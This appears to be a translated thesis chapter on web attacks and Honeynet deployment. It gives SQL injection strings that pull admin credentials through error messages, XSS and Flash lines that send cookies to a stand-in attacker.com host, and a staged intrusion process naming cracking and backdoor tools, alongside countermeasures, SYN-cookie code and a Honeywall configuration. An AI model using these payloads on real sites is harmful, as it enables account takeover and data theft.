Step 1: Walk through the User table one row at a time.

Username: ' union select 1,1--

or:

Username: ' union select min(tkUsername),1 from User where tkUsername > 'a'--

Error produced:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value 'admin' to a column of data type int.

We now know that one account in the User table is admin.

Step 2: To learn the following values, enter the string:

Username: ';select min(tkUsername),1 from User where tkUsername > 'admin' union select 1,1 from User--

Error produced:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value 'map' to a column of data type int.

We have obtained information about the next account, map.

Step 3: Repeat step 2 to obtain each row of the tkUsername column of the User table in turn.

Step 4: To learn the tkPassword values, proceed as follows:

Username: ';select tkPassword,1 from User where tkUsername='admin' union select 1,1 from User--

Error produced:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value 'passOf' to a column of data type int.

To learn about the tables and columns in the database, the system view INFORMATION_SCHEMA.TABLES can be queried:

SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES

INFORMATION_SCHEMA.TABLES holds information about every table on the server; the TABLE_NAME column holds the name of each table in the database.

SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='User'

The statement above is used to learn about the columns of the User table.

In summary, these are the techniques attackers commonly use, based on HAVING, GROUP BY and UNION, to extract information from the database during an attack.

Countermeasures

Below are some measures for preventing SQL injection.

1.1.1.13. Data validation
Validating data is a complex matter and is often not given enough attention in applications. The right approach to data validation is not simply to bolt a few functions onto the application, but to check comprehensively and quickly so as to achieve the goal. For example, a filter that strips invalid data such as --, select and union, or a control function that removes single quotes, can be implemented as follows.

Some basic ways to implement data-validation functions

Method 1: Replace the single quote

function escape( input )
    input = replace(input, "'", "''")
    escape = input
end function

Method 2: Reject invalid data

function validate_string( input )
    known_bad = array("select", "insert", "update", "delete", "drop", "--", "'")
    validate_string = true
    for i = lbound( known_bad ) to ubound( known_bad )
        if ( instr( 1, input, known_bad(i), vbtextcompare ) <> 0 ) then
            validate_string = false
            exit function
        end if
    next
end function

Method 3: Accept only valid data

function validatepassword( input )
    good_password_chars = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
    validatepassword = true
    for i = 1 to len( input )
        c = mid( input, i, 1 )
        if ( InStr( good_password_chars, c ) = 0 ) then
            validatepassword = false
            exit function
        end if
    next
end function

1.1.1.14. Locking down SQL Server (SQL Server Lockdown)

This is a list of the tasks needed to protect SQL Server:
* Determine the methods used to connect to the server:
* Use the Network Utility to check that only the network libraries in use are enabled.
* Review all the accounts in SQL Server
* Create only low-privilege accounts for applications
* Remove unnecessary accounts
* Ensure that every account has a proper password
* Review the objects that exist
* Many extended stored procedures can be removed safely. If this is done, consider also removing the .dll files that contain the extended stored procedures' code.
* Remove all sample databases such as northwind and pubs
* Remove unused stored procedures such as master..xp_cmdshell, xp_startmail, xp_sendmail and sp_makewebtask
* Review which accounts can access which objects
* An application's account used to access the database should be granted only the minimum privileges needed for the objects it uses.
* Check the server's patch level: some attacks, such as buffer overflow and format string attacks, target this layer of protection.
* Review the sessions running on the server
* Change "Startup and run SQL Server" to a low-privilege user account in SQL Server Security.

1.1.1.15. Encrypting data

This is a very effective method for protecting information in general and the web database's information in particular; it prevents or reduces damage even when a hacker has gained control of the website, because the information in the database is encrypted. One illustration of the strength of this measure: in the SQL injection techniques presented above, the hacker had a step in which SQL statements were injected to extract the admin account's username and password from error messages. Clearly, if encryption had been used, the hacker would obtain only the encrypted value of the admin account's data (usually a value passed through a hash function). The hacker would then find it very difficult to recover the admin account's real username and password and would have to give up. Many database management systems now support encryption, such as SQL Server 2005, Oracle and MySQL, the strongest being Oracle, which is widely used in banks, financial companies and securities firms.

Remarks:
- This shows the necessity and importance of validating data before processing it.
- Besides validating data, the application should encrypt data inside the database itself and must not emit error pages that report SQL syntax errors, so that the hacker cannot gather information about the database.
- Alongside this stands the network security awareness of the network administrator.

Injecting code that executes in the victim's browser (Cross-Site Scripting)

Introduction to XSS

Cross-Site Scripting (abbreviated XSS) is an attack method that inserts into a web application's source code fragments of code capable of stealing or setting important information such as cookies and passwords, so that
they run as part of the web application and serve to supply or carry out whatever the hacker wants. Cross-Site Scripting (XSS) is one of the most common attack techniques today, and it is also one of the important security problems for web developers and web users alike. Any website that lets users post information without strict checking for dangerous code may harbour XSS flaws. Cross-Site Scripting (abbreviated XSS rather than CSS, to avoid confusion with HTML's Cascading Style Sheets) is an attack technique that inserts into dynamic websites (ASP, PHP, CGI, JSP, ...) HTML tags or dangerous script code that can harm other users. The dangerous code inserted is mostly written in client-side scripting languages such as JavaScript, JScript and DHTML, and may also be plain HTML tags. XSS has quickly become one of the most common flaws in web applications, and its threat to users keeps growing. The winner of the eWeek OpenHack 2002 contest was the person who found two new XSS flaws; the danger of XSS is evidently receiving ever more attention. Example: http://www.ibm.com/developerworks/tivoli/library/s-csscript/

The traditional XSS attack method

Web applications often store important information in cookies. A cookie is a piece of information that the application stores on the user's hard disk, and only the application that set the cookie can read it. Therefore the hacker only has a chance to steal the cookie while the user is in a session with the application. The hacker's first job, having found the flaw in the application, is to find the target page to which the user will be lured to log in.

Steps of the traditional XSS attack

Summary of the steps:
Step 1: The hacker learns that the user is using a web application with an XSS flaw.
Step 2: The user receives a link via e-mail or on the website itself (on a guestbook or banner it is easy to add a link created by the hacker). The hacker usually catches the user's attention with phrases that arouse curiosity, such as "Check your account" or "An attractive prize is waiting for you".
Step 3: The information (cookie, name, password, ...) is transferred to the hacker's server.
Step 4: The hacker creates a CGI program (steal.cgi in this example) or a web page that records the stolen information in a file.
Step 5: Having received the necessary information, the hacker can use it to get into the user's account.

Example: exploiting the flaw in the hotwired.lycos.com application, the hacker could do the following:

<html>
<head>
<title>Look at this!</title>
</head>
<body>
<a href="http://hotwired.lycos.com/webmonkey/index1.html?tw=<script>document.location.replace('http://www.attacker.com/steal.cgi?'+document.cookie);</script>">An attractive prize is waiting for you</a>
</body>
</html>

Once the user clicks the link "An attractive prize is waiting for you", the cookie on the victim's machine is stolen and passed as the parameter to the hacker's steal.cgi program:

http://www.attacker.com/steal.cgi?lubid=010000508BD3046103F43B8264530098C20100000000;%20p_uniqid=8sJgk9daas7WUMxV0B;%20gv_titan_20=5901=1019511286

XSS attacks using Flash

Besides these ways of delivering a dangerous piece of code, the hacker can also exploit
Flash files to steal information. Macromedia Flash can be programmed in a scripting language built into Flash, ActionScript, whose syntax is simple and similar to JavaScript, C or Perl. For example the getURL() function is used to call another web page; its parameter is usually a URL such as http://www.yahoo.com:

getURL("http://www.yahoo.com")

However, the URL can be replaced with JavaScript:

getURL("javascript:alert(document.cookie)")

The example above pops up a message box containing the cookie of the web page that hosts the Flash file. The web page has thus been attacked by inserting a piece of JavaScript into the web application through a Flash file. A clearer example of this attack is the following statement inside a Flash file, which executes when the Flash file is loaded:

getURL("javascript:location('http://www.attacker.com?newcookie='+document.cookie)")

So when a user views the web page containing this Flash file, the cookie set by that page is immediately sent to the hacker.

Countermeasures

As mentioned above, an XSS attack only works when a web page carrying the attacker's malicious script is delivered to the victim's browser. Web developers can therefore protect their websites from abuse through XSS attacks by making sure that dynamically generated pages contain no script tags: filtering and validating the input data received from users, or encoding and filtering the values output to users. For data entered by users, the web application designer should take the following basic steps:
* Create a list of the HTML tags that are allowed.
* Remove the <script> tag.
* Filter out any JavaScript/Java/VBScript/ActiveX/Flash-related code.
* Filter single and double quotes.
* Filter the Null character (because a piece of code appended after a Null may go unnoticed by an application that has already stripped <script> tags, since the application assumes the string ended at the Null).
* Remove the characters ">" and "<".
* Special characters may still be allowed, but are encoded according to a defined standard.
* Users should configure their browser to prompt them before executing a scripting language on their machine; depending on how much they trust the site, they decide whether to allow it.

Remarks: XSS is fairly common and easy to apply, but the damage is limited to attacks on the victim's machine through the deceptive links or forms the hacker presents to the victim. Therefore, apart from the application validating its data before using it, what matters most is that users stay alert before entering a new website; it is fair to say that 90% of the protection against this technique comes from user vigilance. In chapter 6, however, the attack is aimed at the server, with the goal of gathering information from the database and thereby gaining administrative rights over the application.

Denial of Service (DoS) attacks

Concept

DoS (Denial of Service) can be described as the act of preventing the legitimate users of a service from accessing and using it. It includes flooding the network, breaking connections to the service, and so on, with the ultimate goal of making the server unable to respond to clients' service requests. DoS can halt a single computer, a local network, or even a very large network system. In essence, the attacker monopolises a large amount of network resources, such as bandwidth and memory, so that requests from other clients can no longer be processed. For example, with the ICMP protocol, a hacker can use an e-mail bomb to send thousands of e-mail messages in order to consume bandwidth and drain the mail server's resources. Alternatively, software can be used to send a flood of requests to the
server so that it cannot respond to other legitimate requests.

DoS attack risks
* ATTACKS ON SWAP SPACE: Most systems have a few hundred MB of swap space to serve client requests. Swap space is usually used for short-lived child processes, so a DoS can be based on filling the swap space.
* ATTACKS ON BANDWIDTH: The bandwidth allotted to each system is limited, so if a hacker sends many requests to the system at once, the bandwidth cannot carry that large volume of data and the system collapses.
* ATTACKS ON RAM: A DoS attack that occupies a large part of RAM can also cause system-destroying problems; the buffer overflow attack is one example of this.
* ATTACKS ON DISKS: A classic attack is filling up the hard disk; the disk overflows and can no longer be used.

Some common forms of attack

1.1.1.16. Using TCP for the traditional SYN flood

Figure 3.1 - The traditional DoS attack

As mentioned regarding connection establishment in part 1, for every SYN packet the server must set aside part of the system's resources, such as buffer memory, to receive and send data over that connection. System resources are finite, however, and the hacker will look for any way to push the system past that limit. (This is also called a half-open connection, because the client leaves the connection half open.) According to Figure 1.13: after the server sends back a SYN/ACK packet accepting the connection to the requesting machine, if that machine's IP address is spoofed the packet can never reach its destination, yet the server must still reserve resources for the request. After some time without a reply from the client, the server sends another SYN/ACK to confirm once more, and so on; the connection stays open. If the hacker sends SYN packets to the server until it can accept no further connections, the system has been brought down.

In short: with only a low-bandwidth link, a hacker can bring down a system. Moreover, the hacker's IP address can be altered, which makes identifying the perpetrator extremely difficult.

1.1.1.17. Bandwidth attacks

- Type 1: The hacker is fully able to flood the system because the hacker's bandwidth exceeds that of the target. This type of attack is not limited by network transmission speed. Example: a hacker with a high-speed T1 line (1.544 Mbps) or faster can easily bring down a system on a 56 Kbps line.
- Type 2: This type of attack is used when the hacker's network link is far slower than the target's. Unlike the traditional DoS attack (part 2), this larger bandwidth attack uses packets from many different systems arriving at the target at the same time, so that the target's link can no longer cope and the server can no longer receive any packets at all.
Figure 3.2 - Bandwidth DoS attack

According to Figure 3.2, all packets enter a computer network through one "Big Pipe" and are then split by the router into "Small Pipes" to the many individual computers according to each packet's IP address. But if the whole "Big Pipe" is flooded with packets addressed to one particular machine in that subnet, the router has no choice but to discard most of the packets, keeping only as many as will fit through that machine's "Small Pipe". This type of attack knocks the target off the Internet. It is a denial-of-service method, but not DoS; it is called DDoS (distributed denial of service), meaning that many machines are triggered at once to send packets to the target (each machine's link is not fast, but many links together form a "Big Pipe"), so that the target can no longer receive packets and is cut off from the Internet, as the following diagram illustrates:

Figure 3.3 - DDoS attack

DRDoS (Distributed Reflection Denial of Service) - the next generation of DDoS: this is also what brought down the grc.com site. The following figure illustrates a DRDoS attack.

Figure 3.4 - DRDoS attack

By spoofing the target's IP address, the hacker sends many packets at once to powerful systems on the network; on receiving these forged SYN packets they accept the connection and reply with a SYN/ACK. Because the hacker has changed the source IP address of the SYN packets to the target's IP address, the SYN/ACK packets are all sent to the target. Receiving so many packets at once, the target's link cannot cope, the target refuses to accept any more packets, and the target system collapses.

Countermeasures

Denial-of-service attacks are the hardest to defend against and to investigate, because most hackers change their machine's IP address, making it very hard to determine who the perpetrator is. To guard against amplification of traffic, one should:
- Disable broadcast at the border router.
- Increase the size of the connection queue; result: queue overflow under many connections can be avoided, but this consumes more resources.
- Shorten the connection-establishment timeout.
- Use software that detects and defeats DoS attacks: most current operating systems support detecting and preventing SYN flood attacks.
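The backlog exhaustion described in 1.1.1.16 and the SYN cookie defence that the text goes on to discuss, as an added Python model that is not code from the thesis: a toy listener either keeps a half-open table of 8 entries, or answers every SYN with a keyed hash it re-derives when the ACK arrives, so that spoofed SYNs cost it no state. Addresses, ports, the secret and the 64-second time slot are constructed values.

```python
"""Toy model of a TCP listener under a SYN flood, with and without SYN
cookies. Added example, not code from the thesis. Addresses, ports, the
secret, the 8-entry backlog and the 64-second time slot are all constructed.
Real kernels also fold the client's MSS into the cookie; that is omitted."""
import hashlib
import hmac
import random
import time

BACKLOG = 8                           # half-open connections the toy server can hold
SECRET = b"constructed-boot-secret"   # a real kernel draws this at random per boot
SERVER = ("10.0.0.20", 80)            # constructed listener address and port


def syn_cookie(src, sport, client_isn, counter, secret=SECRET):
    """Stateless initial sequence number: the high byte carries the time-slot
    counter, the low 24 bits a keyed hash over the 4-tuple, the client's
    ISN and that counter. Nothing about the SYN needs to be stored."""
    msg = f"{src}:{sport}>{SERVER[0]}:{SERVER[1]}:{client_isn}:{counter}".encode()
    digest = hmac.new(secret, msg, hashlib.sha256).digest()
    return ((counter & 0xFF) << 24) | int.from_bytes(digest[:3], "big")


class Listener:
    def __init__(self, use_cookies, clock=time.time):
        self.use_cookies = use_cookies
        self.clock = clock
        self.half_open = {}       # (src, sport) -> server ISN, classic mode only
        self.established = set()
        self.dropped = 0          # SYNs discarded because the backlog was full

    def _slot(self):
        return int(self.clock()) // 64

    def on_syn(self, src, sport, client_isn):
        """Return the ISN placed in the SYN/ACK, or None if the SYN was dropped."""
        if self.use_cookies:
            return syn_cookie(src, sport, client_isn, self._slot())
        if len(self.half_open) >= BACKLOG:
            self.dropped += 1     # this is the state the flood exhausts
            return None
        isn = random.getrandbits(32)
        self.half_open[(src, sport)] = isn
        return isn

    def on_ack(self, src, sport, client_isn, ack):
        """Third handshake step: True if the connection becomes established."""
        if self.use_cookies:
            slot = self._slot()
            for counter in (slot, slot - 1):   # tolerate one slot boundary
                if ack - 1 == syn_cookie(src, sport, client_isn, counter):
                    self.established.add((src, sport))
                    return True
            return False          # forged or stale ACK: nothing was ever stored
        isn = self.half_open.pop((src, sport), None)
        if isn is not None and ack == isn + 1:
            self.established.add((src, sport))
            return True
        return False


def flood_then_connect(use_cookies, spoofed=1000):
    """Constructed scenario: many SYNs from spoofed sources that never complete
    the handshake, then one legitimate client.
    Returns (legit_connected, half_open_entries, syns_dropped)."""
    srv = Listener(use_cookies)
    for i in range(spoofed):
        srv.on_syn(f"198.51.100.{i % 250}", 1024 + i, client_isn=i)
    isn = srv.on_syn("192.0.2.7", 40000, client_isn=777)
    ok = isn is not None and srv.on_ack("192.0.2.7", 40000, 777, isn + 1)
    return ok, len(srv.half_open), srv.dropped


if __name__ == "__main__":
    print("classic backlog:", flood_then_connect(False))   # legitimate client locked out
    print("SYN cookies:   ", flood_then_connect(True))     # legitimate client connects
```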
However, there is also software specifically capable of averting this attack. For example, Linux kernels from 2.0.30 onward implement an option called SYN Cookie: the kernel is tasked with detecting and tracking situations where a SYN attack might be occurring, and then uses a cryptographic protocol such as the SYN cookie to allow the system's legitimate users to keep connecting. Windows NT 4.0 and later use the backlog technique: whenever the connection queue is insufficient, the system automatically provides it with more resources, so the queue is not broken. The application should allow each client to establish only a set maximum number of connections, to avoid a hacker sending many requests at once and causing congestion.

Remarks: Although a denial-of-service attack only brings the system down for a few minutes, the consequences are considerable (financial loss and damage to reputation). Hackers commonly use this technique when they cannot seize administrative control of the system or its information, or when they want to destroy the organisation's reputation. Moreover, address spoofing makes the attack even easier to carry out without fear of detection. This technique is usually carried out with the help of tools such as ping of death and teardrop.

The latest attack techniques

Security experts have listed the top 10 web attack techniques and predicted that online banking transactions are the most at risk of hacker intrusion. The discovery by Dương Ngọc Thái, a Vietnamese security expert, was ranked first. A panel of security experts ranked the web attack techniques of 2010 and listed the top 10 web attack techniques after a process of evaluation and recording.

Padding oracle crypto attack
The attacker exploits the ASP.NET framework and can take complete control of any website that uses ASP.NET; even more seriously, the attacker can fully take over the Windows servers hosting those websites. (Discovered by: Dương Ngọc Thái and Juliano Rizzo)
Evercookie
JavaScript can be used to create cookies and hide them in 8 different places in the browser, making them hard to remove completely. Through Evercookie, a hacker can get into the computer even after the cookies have been deleted. (Created by: Samy Kamkar)

Autocomplete attack
The autocomplete feature fills in forms on a web page automatically (it is enabled by default); a web page containing malicious code can then force the browser to fill in personal information drawn from various sources on the victim's computer. (Created by: Jeremiah Grossman)

HTTPS attack by cache injection
Malicious code is injected into a JavaScript library held in the browser's cache, so the hacker can break a website even if it is protected by SSL, and the cache has to be wiped clean. Nearly half of the top 1 million websites use extended JavaScript libraries. (Created by: Elie Bursztein, Baptiste Gourdin and Dan Boneh)

Bypassing CSRF protection with ClickJacking and HTTP Parameter Pollution
This attack tricks the user in order to obtain the password to their e-mail; attackers can then reset the victim's password and access the victim's account directly. (Created by: Lavakumar Kuppan)

Universal XSS in IE8
A flaw in IE8 lets a hacker plant malicious code in web pages and take control of the machine. (Created by: David Lindsay and Eduardo Vela)

HTTP POST DoS
A DDoS technique based on an architectural flaw in the HTTP POST method: connections are kept open as long as possible to exhaust the server's resources. Once too much data is sent to the server at the same time, the server becomes overloaded. (Created by: Wong Onn Chee and Tom Brennan)

JavaSnoop
When data is sent to the server, the JavaSnoop tool comes along to check whether the applications on the server are secure. A hacker could hide behind this tool. (Created by: Arshan Dabirsiaghi)

CSS History attack in Firefox without JavaScript, for port scanning on the internal network
This attack can seize data from the browser's history; the information in the history can help the hacker mount phishing attacks. (Created by: Robert "RSnake" Hansen)

Java Applet DNS Rebinding
The hacker can control a Java applet, making the browser ignore the DNS cache, after which the user can fall into the trap. Java applets are small programs that run inside the web browser. (Created by: Stefano Di Paola)

General summary of the hacker's attack process

From the attack techniques presented above, the process of a hacker's attack on a web service can be summarised as follows:

Step 1: Footprinting (information gathering): this is what the hacker does to gather the maximum amount of information about the server/enterprise/user, including details of IP addresses, Whois, DNS and so on, that is, the official information related to the target. Supporting tools: UseNet, search engines, Edgar, any Unix client, http://www.networksolutions.com/whois, nslookup ls -d, http://www.arin.net/whois, dig.

Step 2: Scanning: most of the important information about the server is obtained in this step, including port scanning and operating system identification, to learn the ports on the server and listen on the data path. Tools: fping, icmpenum, Ws_ping ProPack, nmap, SuperScan, fscan, ...

Step 3: Enumeration (listing, looking for vulnerabilities): the third step is to look for poorly protected resources, or user accounts that could be used to break in,
including default passwords and default scripts and services. Many network administrators are unaware of these values or never change them. Supporting tools: null sessions, DumpACL, sid2user, OnSite Admin, showmount, NAT, Legion, banner grabbing with telnet, netcat, rpcinfo.

Step 4: Gaining access: the hacker now tries to get into the network using the information gathered in the three previous steps. The method used here may be an attack on a buffer overflow, obtaining and decrypting the password file, or brute-forcing (trying every possibility) the password. Tools: tcpdump, L0phtcrack readsmb, NAT, legion, tftp, pwdump2 (NT), ttdb, bind, IIS, HTR/ISM.DLL.

Step 5: Escalating privilege: once the hacker has got into the network with some account, they try to take control of the whole system. The hacker tries to crack the admin password or uses a vulnerability to escalate privileges; John the Ripper is a very commonly used password cracker. Tools: L0phtcrack, Ic_messages, getadmin, sechole.

Step 6: Pilfering (used when files holding passwords are exposed): once again search engines are used to find ways into the network. Text files containing passwords, or other insecure mechanisms, can be the hacker's target. The information from the previous step is enough to locate and control the server. If this step fails, go to step <9>. Supporting tools: rhost, LSA Secrets, user data, configuration files, Registry.

Step 7: Covering tracks: having obtained the necessary information, the hacker tries to erase traces, deleting the operating system's log files so that the administrator does not realise the system has been compromised, or cannot identify the intruder even if they do. Clear the logs. Tools: Zap, Event log GUI, rootkits, file streaming.

Step 8: Creating backdoors (preparing for an easier next intrusion): the hacker leaves "back doors", that is, a mechanism that lets them return by a secret route without much effort, by installing a Trojan or creating a new user (in organisations with many users). The means here are Trojans, keyloggers, creating rogue user accounts, scheduling batch jobs, infecting startup files, planting remote control services, installing monitoring mechanisms and replacing applications with Trojans. Tools: members of wheel, administrators, cron, At, rc, Startup folder, registry keys, netcat, remote.exe, VNC, BO2K, keystroke loggers, ...

In short, information gathering is extremely important for attacking a server system. Whether the hacker attacks at the hardware level or through the application, gathering information is still necessary; the question is how the steps are carried out. The hacker need not go through the steps above in order, or through all of them, but a clear grasp of information about the server is always the precondition for a successful attack, and the information gathered determines which technique the hacker will use. Securing a system therefore demands the combined efforts not only of the system administrator but also of the application designer, and the cooperation of the customers who use the web application.

Conclusion: Because the time available for the thesis was limited, this chapter has presented only a few attack techniques considered common and highly dangerous. Of the techniques presented above, SQL injection is the most frequently encountered, so SQL injection has been chosen as the attack technique in the Honeynet attack scenario presented in the next chapter.

Chapter IV - DEPLOYING, INSTALLING AND OPERATING THE HONEYNET SYSTEM

The previous chapters introduced the purpose of deploying and building a Honeynet system, presented its architectural model and operating principles, together with the role and significance of the Honeynet. In the preceding chapter we also learned about some common and dangerous attack techniques against web services. In this chapter the thesis goes on to describe the practical deployment, installation and operation of the Honeynet system. The chapter comprises:
- The practical deployment model
- Installing and configuring the Honeynet system
- Operating the Honeynet system and analysing the hacker's attack technique

1. Practical deployment model

Because, for reasons beyond our control, no static IP address was available, our group deployed a Honeynet system that re-creates some of the attack types hackers have carried out on systems around the world.

Figure 4.1 - Practical deployment model

The table below gives the configuration of the components of the Honeynet:

Component | Operating system | Notes
Honeypot (PC desktop) | Web server (Windows XP) | Web server: IIS + SQL Server; Sebek client installed
Server (Honeynet gateway) | roo-1.4.hw-2009 | Requires 3 network cards
Management (PC desktop) | Windows XP |
Hacker (PC desktop) | Windows XP |

2. Installing and configuring the Honeynet

2.1. Installing and configuring the Honeywall

a) Installation

Installing the Honeywall is straightforward. After inserting the Honeywall Roo installation disc, the following screen appears:

Figure 4.2 - Honeywall installation screen

Follow the prompts and the installation proceeds automatically. Note: the installer wipes the hard disk, so back up any data on it beforehand.

b) Configuration

Once the Honeywall is installed, the first task is to configure it. In practice the Honeywall is the gateway that all traffic into and out of the Honeynet must cross. It operates in bridge mode and uses iptables and snort_inline for data control, and snort and the pcap API for data capture. Release roo-1.4-hw-2009 integrates Sebekd 3.0.5 to receive the Sebek records sent by the Sebek clients, together with Walleye, a web-based analysis and management interface.

After installation the Honeywall reboots and presents the login screen shown below. By default it ships with two accounts, roo and root, both with the password honeynet. For safety, login is only permitted as roo; you then switch to root with su. Change both default passwords before the gateway is connected to anything: they are published in the Honeywall documentation and are the first thing anyone who reaches the management interface will try. The Honeywall provides a dialog-style menu for editing the configuration file /etc/Honeywall.conf.

Figure 4.3 - Honeywall configuration screen

The important parameters in /etc/Honeywall.conf are listed below. Note that this file leaves HwHONEYWALL_RUN=no and HwSEBEK=no; both must be set to yes for the deployment described here, since the gateway has to start at boot and sebekd has to collect what the Sebek clients send.

# Specify the system hostname
# [Valid argument: string]
HwHOSTNAME=roo-test

# Specify the system DNS domain
# [Valid argument: string]
HwDOMAIN=localdomain

# Start the Honeywall on boot
# [Valid argument: yes | no]
HwHONEYWALL_RUN=no

# To use a headless system.
# [Valid argument: yes | no]
HwHEADLESS=no

# This Honeywall's public IP address(es)
# [Valid argument: IP address | space delimited IP addresses]
HwHPOT_PUBLIC_IP=10.0.0.20

# DNS servers honeypots are allowed to communicate with
# [Valid argument: IP address | space delimited IP addresses]
HwDNS_SVRS=

# To restrict DNS access to a specific honeypot or group of honeypots, list
# them here, otherwise leave this variable blank
# [Valid argument: IP address | space delimited IP addresses | blank]
HwDNS_HOST=

# The name of the externally facing network interface
# [Valid argument: eth* | br* | ppp*]
HwINET_IFACE=eth0

# The name of the internally facing network interface
# [Valid argument: eth* | br* | ppp*]
HwLAN_IFACE=eth1

# The IP network connected to the internally facing interface
# [Valid argument: IP network in CIDR notation]
HwLAN_IP_RANGE=10.0.0.0/24

# The IP broadcast address for internal network
# [Valid argument: IP broadcast address]
HwLAN_BCAST_ADDRESS=10.0.0.255

# Enable QUEUE support to integrate with Snort-Inline filtering
# [Valid argument: yes | no]
HwQUEUE=yes

# The unit of measure for setting outbound connection limits
# [Valid argument: second, minute, hour, day, week, month, year]
HwSCALE=hour

# The number of TCP connections per unit of measure (HwSCALE)
# [Valid argument: integer]
HwTCPRATE=20

# The number of UDP connections per unit of measure (HwSCALE)
# [Valid argument: integer]
HwUDPRATE=20

# The number of ICMP connections per unit of measure (HwSCALE)
# [Valid argument: integer]
HwICMPRATE=50

# The number of other IP connections per unit of measure (HwSCALE)
# [Valid argument: integer]
HwOTHERRATE=10

# Enable the SEBEK collector which delivers keystrokes and files
# to a remote system even if an attacker replaces daemons such as sshd
# [Valid argument: yes | no]
HwSEBEK=no

# Enable the Walleye Web interface.
# [Valid argument: yes | no]
HwWALLEYE=yes

# Specify whether to drop SEBEK packets or allow them to be sent
# outside of the Honeynet.
# [Valid argument: ACCEPT | DROP]
HwSEBEK_FATE=DROP

# Specify the SEBEK destination host IP address
# [Valid argument: IP address]
HwSEBEK_DST_IP=10.0.0.253

# Specify the SEBEK destination port
# [Valid argument: port]
HwSEBEK_DST_PORT=1101

# Enable SEBEK logging in the Honeywall firewall logs
# [Valid argument: yes | no]
HwSEBEK_LOG=no

# Specify whether the dialog menu is to be started on login to TTY1
# [Valid argument: yes | no]
HwMANAGE_DIALOG=yes

# Specify whether management port is to be activated on start or not.
# [Valid argument: yes | no]
HwMANAGE_STARTUP=yes

# Specify the network interface for remote management. If set to br0, it will
# assign MANAGE_IP to the logical bridge interface and allow its use as a
# management interface. Set to none to disable the management interface.
# [Valid argument: eth* | br* | ppp* | none]
HwMANAGE_IFACE=eth2

# IP of management Interface
# [Valid argument: IP address]
HwMANAGE_IP=10.10.10.66

# Netmask of management Interface
# [Valid argument: IP netmask]
HwMANAGE_NETMASK=255.255.255.0

# Default Gateway of management Interface
# [Valid argument: IP address]
HwMANAGE_GATEWAY=10.10.10.1

# DNS Servers of management Interface
# [Valid argument: space delimited IP addresses]
HwMANAGE_DNS=

# TCP ports allowed into the management interface.
# Do NOT include the SSHD port. It will automatically be included
# [Valid argument: space delimited list of TCP ports]
HwALLOWED_TCP_IN=443

# Specify whether or not the Honeywall will restrict outbound network
# connections to specific destination ports. When bridge mode is utilized,
# a management interface is required to restrict outbound network connections.
# [Valid argument: yes | no]
HwRESTRICT=yes

# Specify the TCP destination ports Honeypots can send network traffic to.
# [Valid argument: space delimited list of TCP ports]
HwALLOWED_TCP_OUT=22 25 43 80 443

# Specify the UDP destination ports Honeypots can send network traffic to.
# [Valid argument: space delimited list of UDP ports]
HwALLOWED_UDP_OUT=53 123

# Specify whether or not to start swatch and email alerting.
# [Valid argument: yes | no]
HwALERT=no

# Specify email address to use for email alerting.
# [Valid argument: any email address]
HwALERT_EMAIL=root@localhost.localdomain

# NIC Module List - Set this to the number and order you wish
# to load NIC drivers, such that you get the order you want
# for eth0, eth1, eth2, etc.
# [Valid argument: list of strings]
#
# Example: eepro100 8139too
HwNICMODLIST=

# Blacklist, Whitelist, and Fencelist features.
# [Valid argument: string]
HwFWBLACK=/etc/blacklist.txt
# [Valid argument: string]
HwFWWHITE=/etc/whitelist.txt
# [Valid argument: string]
HwFWFENCE=/etc/fencelist.txt
# [Valid argument: yes | no]
HwBWLIST_ENABLE=no
# [Valid argument: yes | no]
HwFENCELIST_ENABLE=no

# The following feature allows the roo to allow attackers into the
# honeypots but they can't send packets out...
# [Valid argument: yes | no]
HwROACHMOTEL_ENABLE=no

# Disables BPF filtering based on the contents of HwHPOT_PUBLIC_IP
# and the black and white list contained within HwFWBLACK and HwFWWHITE
# if the HwBWLIST_ENABLE is on. Otherwise, it just filters based on
# the contents of HwHPOT_PUBLIC_IP
# [Valid argument: yes | no]
HwBPF_DISABLE=no

# This capability is not yet implemented in roo. The variable
# has been commented out for this reason. dittrich - 02/08/05
# Options for hard drive tuning (if needed).
# [Valid argument: string]
# Example: -c 1 -m 16 -d
HwHWPARMOPTS=

# Should we swap capslock and control keys?
HwSWAP_CAPSLOCK_CONTROL=no

The important Honeywall parameters above are illustrated in the following screenshots:
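The listing above is long enough for inconsistencies to slip through: in this very chapter the Sebek client on Linux is pointed at 192.168.1.253 while the gateway collects on HwSEBEK_DST_IP=10.0.0.253, and the file leaves HwHONEYWALL_RUN and HwSEBEK at no. The Python script below is an added example (not part of the thesis or of the roo distribution) that parses a Honeywall.conf-style fragment and checks the handful of invariants a working gateway needs: bridge and collector enabled, honeypots inside the bridged LAN range, Sebek client and server agreeing on destination address and port with HwSEBEK_FATE=DROP, management out of band, outbound restriction on. The embedded configuration is a constructed excerpt of the values quoted above; the check names and messages are mine.

```python
import ipaddress
import re

# Constructed excerpt of the Honeywall.conf directives listed above (only those
# the checks need), reproduced as the file ships them.
HONEYWALL_CONF = """
HwHONEYWALL_RUN=no
HwHPOT_PUBLIC_IP=10.0.0.20
HwINET_IFACE=eth0
HwLAN_IFACE=eth1
HwLAN_IP_RANGE=10.0.0.0/24
HwSEBEK=no
HwSEBEK_FATE=DROP
HwSEBEK_DST_IP=10.0.0.253
HwSEBEK_DST_PORT=1101
HwMANAGE_IFACE=eth2
HwMANAGE_IP=10.10.10.66
HwMANAGE_NETMASK=255.255.255.0
HwALLOWED_TCP_IN=443
HwRESTRICT=yes
HwALLOWED_TCP_OUT=22 25 43 80 443
"""

# Values from the Linux sbk_install.sh fragment in section 2.2.
SEBEK_CLIENT = {"DESTINATION_IP": "192.168.1.253", "DESTINATION_PORT": "1101"}


def parse_conf(text):
    """Parse Hw*=value lines into a dict; comments and blank lines are ignored."""
    conf = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        m = re.match(r"^(Hw[A-Z_]+)=(.*)$", line)
        if m:
            conf[m.group(1)] = m.group(2).strip().strip('"')
    return conf


def lint(conf, sebek_client):
    """Return a list of findings; an empty list means the gateway is consistent."""
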